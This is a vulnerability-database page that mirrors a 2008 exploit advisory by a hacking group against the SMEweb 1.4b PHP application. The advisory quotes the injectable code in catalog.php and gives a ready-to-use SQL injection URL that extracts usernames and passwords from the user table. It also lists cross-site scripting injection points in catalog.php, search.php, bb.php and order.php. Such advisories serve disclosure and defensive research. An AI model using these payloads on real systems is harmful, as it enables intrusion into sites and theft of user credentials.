Lucene search
+L

smeweb 1.4b - SQL Injection / Cross-Site Scripting

🗓️ 02 Jun 2008 00:00:00Reported by CWH UndergroundType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 44 Views

SMEweb 1.4b SQL Injection and Cross-Site Scripting vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-2644
2 Jun 200800:00
circl
circl
Circl
CVE-2008-2652
2 Jun 200800:00
circl
cve
CVE
CVE-2008-2644
10 Jun 200818:00
cve
cve
CVE
CVE-2008-2652
10 Jun 200818:00
cve
cvelist
Cvelist
CVE-2008-2644
10 Jun 200818:00
cvelist
cvelist
Cvelist
CVE-2008-2652
10 Jun 200818:00
cvelist
euvd
EUVD
EUVD-2008-2639
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-2647
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-2644
10 Jun 200818:32
nvd
nvd
NVD
CVE-2008-2652
10 Jun 200818:32
nvd
Rows per page
=======================================================
 SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities
=======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

AUTHOR : CWH Underground
DATE   : 2 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : SMEweb
 VERSION     : 1.4b
 VENDOR      : http://www.smethailand.com/
 DOWNLOAD    : http://www.geocities.com/smes_thailand/smeweb_v14b.zip
#####################################################

---SQL Injection Exploit---

##############################################
Vulnerable: catalog.php (Line:66-69)

if($idp)
 $sql = "select * from ".$fix."catalog where idp='$idp' and category NOT IN ('L1','LA') ";
elseif($category)
 $sql = "select * from ".$fix."catalog where category='$category' order by idp desc limit  1";

 $result = mysql_db_query($dbname,$sql);
###############################################

***It's Work with Magic_quote must turn off***

http://[target]/[path]/catalog.php?idp=1'union select 1,2,password,username,5,6,7,8 from smeweb_user where userid=1 ORDER BY counter/*


---Multiple Remote XSS Exploit---

[+]catalog.php
[+]search.php
[+]bb.php
[+]order.php

Example:

http://[target]/[path]/catalog.php?data=<XSS>
http://[target]/[path]/search.php?keyword=<XSS>
http://[target]/[path]/bb.php?page=<XSS>
http://[target]/[path]/order.php?new_s=<XSS>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-02]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation